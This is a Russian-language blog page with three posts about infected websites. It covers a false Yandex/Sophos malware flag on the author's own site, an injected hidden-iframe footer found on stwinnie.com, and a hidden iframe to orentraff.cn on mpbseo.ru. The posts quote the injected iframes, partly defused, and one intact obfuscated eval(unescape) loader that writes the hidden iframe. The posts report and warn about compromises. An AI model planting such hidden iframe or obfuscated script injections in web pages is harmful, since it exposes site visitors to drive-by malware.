Яндекс + Sophos (R) = недоумки

Есть у меня один очень белый сайт - блог про всякое. Одна из заметок, годовой давности, про то, как я обнаруживал и боролся с зараженными вордпрессами. Описал подробно симптомы и процесс лечения вируса Traffic Statistics. Недели три назад заметил падение трафика на этом сайте в два раза. Подумал что лето и народу про бизнес не интересно. Три дня назад добавляю сайт в вебмастер консоль яндекса - и вижу:

Сайт содержит код, который может быть опасен для посетителей.
В результатах поиска сайт выводится с предупреждающей пометкой. Читать далее...

Сайт содержит код, который может быть опасен для посетителей

Выполнение вредоносного кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, а также к порче или краже данных. В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта. По вашему запросу выполняется перепроверка сайта, она займет несколько дней. Как только результаты проверки будут готовы, на сервисе Яндекс.Вебмастер появится сообщение. Если вы хотите получить сообщение по электронной почте, пожалуйста, укажите это в настройках. Яндекс проверяет страницы сайта выборочно, поэтому список зараженных страниц может быть неполным. Пожалуйста, проверьте и другие страницы, а также элементы, общие для всех страниц. Страница Дата последней проверки тут адрес страницы моего сайта 17 Августа 2009 Информация предоставлена партнёром Яндекса компанией Sophos (R). Яндекс не гарантирует точность Информации и не возмещает никакой ущерб, прямой или косвенный, причиненный в результате использования или невозможности использования Информации, включая, но не ограничиваясь этим, убытки, вызванные неточностью предоставляемой Информации.

Все мои заметки были в безопасном виде, но Софос Р всё равно говорил, что сайт заражен. Хорошо, поставил запись под пароль, запросил перепроверку - всё равно заражен. Оказалось что вордпресс в мета тэг дескрипшен ставит начало записи, а там попался кусок псевдокода - всё равно "заражен".

Итого: не пишите на белый сайтах ничего про вирусы - яндексу и софосу это не понравится.

Мы говорим "Яндекс" - подразумеваем "Лебедев". Антибуки - это круто!

Прочитать полностью...

Три дня на stwinnie.com ругается антивирус.

У stwinnie.com поселился вирус.
Я его блог не читаю, но в ридере висит. Когда ридер скачивает ленту, то антивирус идет по айфрейму и находит там трояна.
В первый день я решил не писать, может сам починит.
На второй день антивирус тоже ругнулся.
А сегодня домены уже забанили:

Requesting http://msn-аnаlytics.net ..
Error: can't resolve hostname to IP address

Requesting http://pinoc.org ..
Error: can't resolve hostname to IP address

Вот футер с сайта stwinnie.com. Для нормального отображения кода после каждой угловой скобки добавлен пробел. Для безопасности английские буквы "а" заменены на русские.

< /index >< /body >
< /html >< src="http://msn-аnаlytics.net/count.php?o=2" width="0" height="0" style="hidden" meborder="0" rginheight="0" rginwidth="0" scrolling="no">< /ifrаme >< src="http://pinoc.org/count.php?o=2" width="0" height="0" style="hidden" meborder="0" rginheight="0" rginwidth="0" scrolling="no">< /ifrаme >< src="http://msn-аnаlytics.net/count.php?o=2" width="0" height="0" style="hidden" meborder="0" rginheight="0" rginwidth="0" scrolling="no">< /ifrаme >< src="http://pinoc.org/count.php?o=2" width="0" height="0" style="hidden" meborder="0" rginheight="0" rginwidth="0" scrolling="no">< /ifrаme >< !--5b709а38e3d0b1а22cаff827fc7380d3-- >



Прочитать полностью...

Сайт Московского Полубомжа содержит вредоносное ПО

Захожу на его сайт и вижу такое:



Вот вопрос - это плагин WP-ban так работает ИЛИ хакеры подложили ИЛИ МПБ так со спамерами борется?

Под катом содержится дезактивированный и расшифрованный текст самого айфрейма и его исходник:


(iframe src="http://orentraff.cn/in.cgi?13" style="visibility: hidden; display: none")(/iframe)

Кто сомневается, вот исходник страницы:

Requesting http://www.mpbseo.ru/ .. Ok
Reply received (reply time: 765 ms)
-----------------------------------
HTTP/1.1 200 OK
Date: Sat, 16 Aug 2008 20:22:13 GMT
Content-Type: text/html
Connection: close
Server: Apache
Content-Length: 2714

...тут текст страницы...

(/html)(script type="text/javascript")
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%31%5C%75%30%30%33%33%5C%75%30%30%32%32%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%37%36%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%36%39%5C%75%30%30%36%32%5C%75%30%30%36%39%5C%75%30%30%36%63%5C%75%30%30%36%39%5C%75%30%30%37%34%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%36%34%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%33%62%5C%75%30%30%32%30%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%32%30%5C%75%30%30%36%65%5C%75%30%30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
(/script)


Прочитать полностью...